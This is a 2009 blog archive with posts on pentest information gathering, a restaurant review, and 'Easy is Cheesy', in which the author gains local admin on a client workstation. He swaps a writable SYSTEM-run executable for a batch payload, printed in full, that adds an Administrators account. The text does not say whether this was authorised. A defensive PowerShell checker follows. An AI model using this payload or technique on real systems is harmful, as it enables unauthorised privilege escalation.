I enjoyed listening to the last two @exoticliability podcasts from @indi303 and Ryan Jones.
Podcast #37 covered intel gathering for clients, leaky strippers, and leaky consultants saying stupid things on social networks. Having worked with a couple of firms in the past and done some pentesting, I somewhat agree with their general opinion on information / intelligence gathering during a pentest. In both firms I worked with, information gathering usually received 10% of the budget for the engagement. This was a management decision at the firms, although I'm sure it was flexible.
Looking back, if I were in a management position, I think I would have been cautious about moving the 10% level higher across the board until I saw the value proposition in the results. If we have been doing X and X has been working, why fix it? To be honest, though, the thought of doing more than 10% information gathering never crossed any of our minds. That, in and of itself, is probably an issue. Why not do 25, 50, or 75% of the engagement as information gathering (or some other component)? And this goes to a bigger question: what is the right amount for any phase of the engagement? Constraints, such as target scope, types of tests, etc., would play heavily into this, of course. Still, we treat these numbers as sacred, and they aren't.
#37 also talked about data leakage. Chris brought up an example of someone leaking the data center location of a possible client. I have two thoughts on this: the knowledge of a data center location should not decrease its security, and if the client thinks the secret is important, it is important. I don't use Foursquare, but, yeah, tweeting your location whilst at a client is stupid. I disabled my Twitter clients from announcing this data a while ago, because, seriously, anyone needing to know where I am is just going to call me. They are not going to look up my longitude and latitude on Twitter, paste that into Google Maps, and then call me. Building on my thoughts above, though, sensitive data is perceived to be important by the client, regardless of its actual importance in reality. In our last paychecks, our clients paid our wages in some way, shape or form. Tomorrow, they might not if you don't care about them.
Tuesday, October 27, 2009
Thursday, October 15, 2009
Easy is Cheesy
I received a brand-new, corporate-blessed workstation last week. Since I have a little downtime at my new client, I poked around at the system. The workstation is based on a standard build, with some security tools installed. My account is not part of the local Administrators group (Windows-based OS), so I am limited in what can be installed. My goal was to obtain local admin privileges, which took about 4 hours to achieve.
Usually, on a new system, I like to figure out what already exists in log files and the like. The system had a bunch of automated install files left over from the image creation and subsequent updates. Out of all the files I parsed, only one had password information in it, and the passwords were redacted via a '****' substitution. Not too shabby. The second method was to enumerate file permissions and see if there was an easy way in via a script or automated task. This was the basic vector I used to elevate privileges.
I noticed files like win.ini and system.ini were wide open to any user to modify. Unfortunately, this version of Windows does not use these files in any way I found to execute a file (such as the [windows] run= directive in win.ini). I spent way too much time here, trying to see if my old Win 3.11 skills could be of some use :-) Some other files also had weak permissions, but none of them were in use or likely to be in use in the foreseeable future. But here's where it gets funny: many files in Program Files had "BUILTIN\Users:C" or "Everyone:F" (via xcacls.exe), i.e. Change or Full Control for every standard user on the box.
Pulling up Task Manager showed a list of programs that ran as SYSTEM. Cross-referencing that list against the weak ACLs gives the 'exploit': just replace (rename, copy) one of those executables with something that does a nefarious task, and SYSTEM runs it for you the next time the program starts. Being ol' school, I whipped up the following batch file and converted it to an EXE:
@echo off
REM Creates a local user and adds it to Administrators. It only works because
REM it runs as SYSTEM once dropped in place of a SYSTEM-owned executable.
REM Fill in OURUSER / OURPW before converting to an EXE.
SET OURUSER=YYYYY
SET OURPW=XXXXX
SET OURGROUP=Administrators
REM Full paths, so the payload does not depend on the PATH of whatever launched it.
SET NETEXE=%SYSTEMROOT%\SYSTEM32\net.EXE
SET FINDS=%SYSTEMROOT%\SYSTEM32\findstr.EXE
SET OUTPUT=%SYSTEMROOT%\TEMP\%OURUSER%.TXT
IF EXIST "%OUTPUT%" DEL "%OUTPUT%"
REM No ERRORLEVEL checks (see [1]); every command just appends its output, stderr included, to the log.
echo [X] Attempting to add user %OURUSER%... >> "%OUTPUT%"
"%NETEXE%" user %OURUSER% %OURPW% /ADD >> "%OUTPUT%" 2>&1
echo [X] Checking user creation... >> "%OUTPUT%"
"%NETEXE%" user | "%FINDS%" /I "%OURUSER%" >> "%OUTPUT%" 2>&1
echo [X] Attempting to add user %OURUSER% to group %OURGROUP%... >> "%OUTPUT%"
"%NETEXE%" localgroup %OURGROUP% %OURUSER% /ADD >> "%OUTPUT%" 2>&1
echo [X] Checking group addition... >> "%OUTPUT%"
"%NETEXE%" localgroup %OURGROUP% | "%FINDS%" /I "%OURUSER%" >> "%OUTPUT%" 2>&1
Pretty simple. Once converted, I just renamed the target EXE (a running executable can't be overwritten or deleted, but it can be renamed, which is why the rename-then-copy dance is what gets the payload in place), copied my EXE in under its name, and rebooted the system [1]. Upon reboot, the account was created. The humor of this is the client had a HIDS program installed but only turned on to monitor versus block. The HIDS detected the rogue program and might have prevented such an elementary attack, but the real fix is the file permissions: a binary that runs as SYSTEM must not be writable, renameable, or sitting in a directory that BUILTIN\Users or Everyone can add files to.
Sometimes, easy is cheesy, but also just as valid as a 0-day.
[1] Well, this took a little bit of troubleshooting. The batch-to-EXE converter acted a bit flaky on error checking (via %ERRORLEVEL%). Instead of checking and using conditionals to log different messages, I just in-lined everything to fire and log.
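As an added example, not from the original post or its author: a PowerShell check for the condition exploited above, generalized from the manual Task Manager plus xcacls walk to every service that runs as LocalSystem. It pulls each service's image path from WMI, then inspects the ACL on the executable and on its parent directory (the rename-then-copy trick needs the directory, not just the file) for Allow entries that give Everyone, Authenticated Users, BUILTIN\Users or INTERACTIVE any right that lets them replace the file. The well-known SIDs and the FileSystemRights bits are standard Windows values; the script assumes Windows PowerShell 3.0 or later (for Get-CimInstance and Add-Member -NotePropertyName) and runs as a standard user, since reading an ACL does not require admin rights.

```powershell
# Added example (not from the original post): flag LocalSystem service binaries that
# low-privileged users can replace. Assumes Windows PowerShell 3.0+; no admin needed.

# Principals every standard interactive user belongs to, keyed by well-known SID.
$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}

# Rights that let a user overwrite, rename/delete, or re-ACL a file, or drop a new file
# into a directory. GENERIC_ALL / GENERIC_WRITE cover ACEs written with generic bits.
$FileRights = [System.Security.AccessControl.FileSystemRights]
$DangerMask = [int]($FileRights::WriteData -bor $FileRights::AppendData -bor
                    $FileRights::Delete    -bor $FileRights::ChangePermissions -bor
                    $FileRights::TakeOwnership)
$DangerMask = $DangerMask -bor 0x10000000 -bor 0x40000000

function Get-ServiceImagePath {
    # Extract the executable from a Win32_Service.PathName such as
    #   "C:\Program Files\Vendor\agent.exe" -service
    #   C:\Windows\system32\svchost.exe -k netsvcs
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) { return $PathName.Split('"')[1] }
    $m = [regex]::Match($PathName, '^(.+?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($PathName -split '\s+')[0]
}

function Get-WeakAces {
    # Emit one object per Allow ACE on $Path that grants $DangerMask bits to a low-priv SID.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }
        if (-not $LowPrivSids.ContainsKey($sid)) { continue }
        if (([int]$ace.FileSystemRights -band $DangerMask) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Principal = $LowPrivSids[$sid]
            Rights    = $ace.FileSystemRights
        }
    }
}

$findings = foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.StartName -eq 'LocalSystem' }) {
    $exe = Get-ServiceImagePath $svc.PathName
    if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
    # Check the image itself and the directory it lives in: a writable directory is
    # enough to rename the original and drop a replacement under its name.
    foreach ($target in @($exe, (Split-Path -Parent $exe))) {
        try {
            Get-WeakAces -Path $target | ForEach-Object {
                $_ | Add-Member -NotePropertyName Service -NotePropertyValue $svc.Name -PassThru
            }
        } catch { Write-Warning "Could not read ACL on ${target}: $_" }
    }
}

if ($findings) { $findings | Sort-Object Service, Path | Format-Table -AutoSize }
else { 'No LocalSystem service image or directory is writable by standard users.' }
```

A Deny ACE for the same principal would override an Allow and is not modelled here, so treat each hit as a candidate to confirm with icacls before reporting it. The fix for a confirmed hit is to tighten the ACL so only Administrators, SYSTEM and TrustedInstaller can write to the binary and its directory; a HIDS in monitor mode, as in the post, only tells you after the swap has happened.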
Wednesday, October 07, 2009
Fish & Chips! The Anchor is Open
So, Northeast has a new fish & chips spot, The Anchor Fish & Chips. I love local businesses, especially when it comes to bars, pubs, and restaurants. I'm not a big foodie at all. I like White Castle for some things, Red Stag Supper Club for others. It's all about mood for me. Whatever that means...
I'm not a food reviewer, so don't expect a lot of multi-syllabled words. Expect more of Uncle Walt Whitman here. Go see the building if you like that sort of stuff. It works for the neighborhood. Also, experience the service yourself, it may have been better than it was for me. I'm about food and beer.
The meal, when it came out, was moderately good (3 out of 5). The chips themselves were awesome! The salt, golden to amber color, and crisp to mash-like filling made the chips very tasty. The fish also was good, but the chips were more memorable to me. The fish batter was somewhat light, sometimes being a bit greasy. If it wasn't a little greasy, I'd probably walk out because the damn thing just came out of a hot fryer, regardless of the time it spent under the hot lights. Being silly, I thought it was an English fish & chips spot, so I was again saddened to not see any peas (mushy or otherwise) w/ the meal. But, it's not English, it's Irish. I guess the Irish don't like their mushy peas with fish, so they put them on the side for $2.50. (Maybe peas are Protestant or something, who knows...)
Selfish Recommendation #1: throw just a bit of mushy peas in the basket for a week and see if people comment one way or the other. Let me know when you do this so I can be cheap and get some for free. ;-)
The only annoyance I had was with one of the Governors (the thin boy that needs to eat more). I asked for some malt vinegar and I was almost run out of the bar. He educated me on how people that use malt vinegar are Neanderthal at best and Iowans at worst. Malt vinegar doesn't bring out the flavor of anything and only overshadows the chips, he continued. And, white vinegar is God's food or something, with an astringency that truly works with the chip. I should have called bullshit or something.
Prior to this, I did realize they had white vinegar on the counter. I tried a couple of drops on my finger first, to see if I would like it. I_didn't_taste_anything. I tried again, and got the faintest vinegar taste, with a little bit of sourness. I passed this observation to the Guv, but I think at this time he thought I probably was from Iowa. I proceeded to create a swimming pool of vinegar in my basket when the meal came out, but all for naught. (Maybe it had something to do with the vinegar being Heinz.)
I felt like an idiot, wondering if my years of malt vinegar have destroyed my inexperienced palate. I then felt like I was duped, wondering if there was a camera somewhere recording my expressions, which should be on Youtube by now or something. The Guv stated that only true fish & chip connoisseurs have the balls to douse their meal with God's white vinegar. I really wanted to throw the bottle at him, but that would have ended the meal on an unfortunate note. And, I still thought there was a camera somewhere, even though I cased out the spot over and over.
Unselfish Recommendation #1: Don't make fun of your customers, unless they are from Iowa. I'll probably try out the spot again, but I really felt like an idiot. Having molten cheese spill on your fingers or burn your lips because you didn't listen to Renee at Matt's proves you're an idiot. Being made fun of never having a Jucy Lucy and not knowing how to tackle one makes you feel like an idiot. That was the whole vinegar thing for me. There's a subtle difference here, but one is mea culpa and the other is tua culpa. Figure that out, and you'll be a better Guv, Guv.